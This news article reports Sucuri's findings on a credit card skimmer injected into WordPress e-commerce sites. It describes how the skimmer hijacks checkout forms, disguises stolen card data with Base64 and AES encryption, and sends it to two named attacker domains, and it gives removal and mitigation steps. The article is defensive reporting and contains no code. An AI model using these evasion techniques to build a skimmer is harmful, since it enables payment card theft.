WordPress users targeted by crafty new credit card skimmer malware
- Sucuri discovers malicious code embedded in WordPress sites
- The code collects and exfiltrates payment information from e-commerce websites
- The researchers warn WordPress site administrators to inspect all modified code
Cybercriminals are once again targeting WordPress websites with credit card skimmers, stealing victims’ sensitive payment information.
This time the company sounding the alarm is Sucuri, whose researcher Puja Srivastava recently published a new analysis of the attack, noting that criminals are targeting WordPress e-commerce websites and inserting malicious JavaScript code into a database table linked to the content management system (CMS). .
This script calls the credit card skimmer just as the victim is about to enter payment information.
“The malware is activated specifically on checkout pages, by hijacking existing payment fields or injecting a fake credit card form,” the researcher said.
The unnamed skimmer is built to steal all payment information required for internet transactions: credit card numbers, expiration dates, CVV numbers, and billing information.
Cybercriminals typically use stolen credit card information to fund malicious advertising campaigns on social media platforms, purchase malware or malware-as-a-service (MaaS), or purchase gift cards as these are difficult to trace.
Sucuri added that the skimmer can also collect data entered on legitimate payment screens in real time, maximizing compatibility.
All acquired information is encoded in Base64 and combined with AES-CBC encryption to blend in with regular traffic. It is then exfiltrated to a server under the attacker’s control (either “valhafather(.)xyz” or “fqbe23(.)xyz”).
To remove the malware, Sucuri suggests inspecting all custom HTML widgets. That can be done by logging into the WordPress admin panel, navigating to wp-admin > Appearance > Widgets and checking all custom HTML block widgets for suspicious or unknown tags. The researchers also suggested mitigation measures, including regular updates, management of administrator accounts, file integrity monitoring, and running a web application firewall.
Skimmers seem to be rising in popularity again. Less than three weeks ago, the European Space Agency was discovered to be hosting this type of malicious code, which stole payment information, including sensitive credit card information, from countless victims.
Via The hacker news